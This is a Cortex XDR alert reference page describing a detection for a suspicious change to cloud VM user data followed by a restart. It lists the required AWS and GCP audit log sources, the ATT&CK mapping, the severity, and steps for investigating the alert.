Suspicious cloud user data modification attempt followed by VM restart

Cortex XDR Analytics Alert Reference by data source
Product
Cortex XDR
Last date published
2026-05-18
Category
Analytics Alert Reference
Index by
data source

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

1 Hour

Deduplication Period

1 Day

Required Data

  • Requires one of the following data sources:
    • AWS Audit Log
      OR
    • Gcp Audit Log

Detection Modules

Cloud

Detector Tags

ATT&CK Tactic

Execution (TA0002)

ATT&CK Technique

Cloud Administration Command (T1651)

Severity

Low

Description

Suspicious user data modification followed by VM restart, possibly an attempt to run altered startup scripts at boot.

Attacker's Goals

Execute arbitrary code, establish persistence, or alter instance startup behavior through modified user data.

Investigative actions

  • Review the identity who modified the instance user data.
  • Inspect the user data script for malicious content.